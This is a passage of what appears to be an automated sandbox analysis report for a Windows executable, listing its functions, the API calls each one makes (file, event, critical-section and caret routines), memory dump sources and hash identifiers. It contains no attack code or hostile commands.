                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footerInitialize__onexit
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 916978925-0
                                                                                                                                                                                                          • Opcode ID: caa77ec5b49612b5673c168ead499d84065c5d174e9d5e189b540c952119de36
                                                                                                                                                                                                          • Instruction ID: 4283bbc0da10fafe2ed3447f10d9f0859ebea693bd00dc1e685b078856472080
                                                                                                                                                                                                          • Opcode Fuzzy Hash: caa77ec5b49612b5673c168ead499d84065c5d174e9d5e189b540c952119de36
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A31AB70A04709EBDB04DF58D9097AEBBF4FF99724F20025BE418A7381D7B82A049B85
                                                                                                                                                                                                          Function 0048E270 Relevance: 6.1, APIs: 4, Instructions: 85fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0048E3D0: GetProcAddress.KERNEL32(?,?), ref: 0048E477
                                                                                                                                                                                                          • CreateFileW.KERNEL32(EFE0703F,40000000,00000001,00000000,00000002,00000000,00000000,EFE0703F,00000000), ref: 0048E2C8
                                                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 0048E2FE
                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00597A94,00000010,?,00000000), ref: 0048E324
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0048E33E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$Create$AddressCloseHandleProcWrite
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2894970915-0
                                                                                                                                                                                                          • Opcode ID: 2f4382049ca2a752f84ed54e7643d14688204e1f1246283fdc424cff93cbb240
                                                                                                                                                                                                          • Instruction ID: 55e22696e4cdb543d992f818e317bf2f8fad95eeb2f4fe8dfbbcc67412793603
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f4382049ca2a752f84ed54e7643d14688204e1f1246283fdc424cff93cbb240
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A431C331A41208EFDB10DBA4DC46FDEBBB4EB15B14F50052AF911B72C0DB746A48CB94
                                                                                                                                                                                                          Function 0041C140 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(00597C84), ref: 0041C1AE
                                                                                                                                                                                                            • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0041C1CA
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(00597C84), ref: 0041C1E5
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(00597C84), ref: 0041C246
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footerInitialize__onexit
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 916978925-0
                                                                                                                                                                                                          • Opcode ID: a006bf084aaf4b5e101dc5f2a51e9c07270f9802790f3c0861aa6c33e20d5ae5
                                                                                                                                                                                                          • Instruction ID: e4ff037c1e074eaef1e462576e27eb7f9e701e57f15d395cb24d58d2077de5ab
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a006bf084aaf4b5e101dc5f2a51e9c07270f9802790f3c0861aa6c33e20d5ae5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC31DE70958249DBCB21CFA8DD097D9BFF4FB18724F10829BE815A7380D7B51A449B81
                                                                                                                                                                                                          Function 0049C1E0 Relevance: 6.0, APIs: 4, Instructions: 27timeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • IsWindow.USER32(?), ref: 0049C1EB
                                                                                                                                                                                                          • GetCaretBlinkTime.USER32(00000000), ref: 0049C209
                                                                                                                                                                                                          • SetTimer.USER32(?,?,00000000), ref: 0049C216
                                                                                                                                                                                                          • ShowCaret.USER32(?), ref: 0049C226
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Caret$BlinkShowTimeTimerWindow
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 669903483-0
                                                                                                                                                                                                          • Opcode ID: ab45ce15f426f730a8d74a4f1f16a0c4c9778292bc8ccc5b3fbc602e68351fc4
                                                                                                                                                                                                          • Instruction ID: 99db7e4a554883cef2b953eaab7c5161214fad1baa6cdc75bbd3fb7278538406
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab45ce15f426f730a8d74a4f1f16a0c4c9778292bc8ccc5b3fbc602e68351fc4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55F015366046109BDE202F6DFC48BD73AACEB29326B000A79B442D21B1CB25D889AB50
                                                                                                                                                                                                          Function 00422460 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00422590: CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 00422671
                                                                                                                                                                                                            • Part of subcall function 00422590: CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 00422705
                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 0042250D
                                                                                                                                                                                                          • SetEvent.KERNEL32(00000000), ref: 00422514
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Event$Create
                                                                                                                                                                                                          • String ID: dllquery
                                                                                                                                                                                                          • API String ID: 1287507382-3762084462
                                                                                                                                                                                                          • Opcode ID: 844db3ba58ae8aa231536162d5408f5bd4ffb248e7e307de069a5294f40f383b
                                                                                                                                                                                                          • Instruction ID: a63fc1301ba6287be8cfae0cfd820a5b2089b576439e38f84b321128d0625f5d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 844db3ba58ae8aa231536162d5408f5bd4ffb248e7e307de069a5294f40f383b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48313771A00108ABEB04EFA8EE49BEDBB71FF45314F608629F401A72C1DB795A84CB55
                                                                                                                                                                                                          Function 0046E240 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,EFE0703F,?,?,0054B140,000000FF), ref: 0046E281
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                          • String ID: 0F$@F
                                                                                                                                                                                                          • API String ID: 3664257935-854975247
                                                                                                                                                                                                          • Opcode ID: e60468d8558ab10ed23c37b5807159761484d6180806933727f095259a2dadcb
                                                                                                                                                                                                          • Instruction ID: 71f482a42453dca0316d7d1724b4bafe9a8805fb4aae109ca3ec81d8c884bcfa
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e60468d8558ab10ed23c37b5807159761484d6180806933727f095259a2dadcb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16018175504708ABE3118F08D905B9ABBE8FB09714F00866AEC5597780E7B99904CB90
                                                                                                                                                                                                          Function 0046E160 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0046E19F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                                                                          • String ID: se$spon
                                                                                                                                                                                                          • API String ID: 190572456-1233149680
                                                                                                                                                                                                          • Opcode ID: a18cd38359c5d619c84d42f346176a8ecf3405a003b961118e237ec072f871c9
                                                                                                                                                                                                          • Instruction ID: b09cfb9e6fa65308120aff59ceb31b5997679d01bd5d3a0a7ffbfa3232e5ab9b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a18cd38359c5d619c84d42f346176a8ecf3405a003b961118e237ec072f871c9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7BF0A435E04248EFD700DFA9C8057AEF7F8EF59210F00815DE845A7250EB70AA459BA5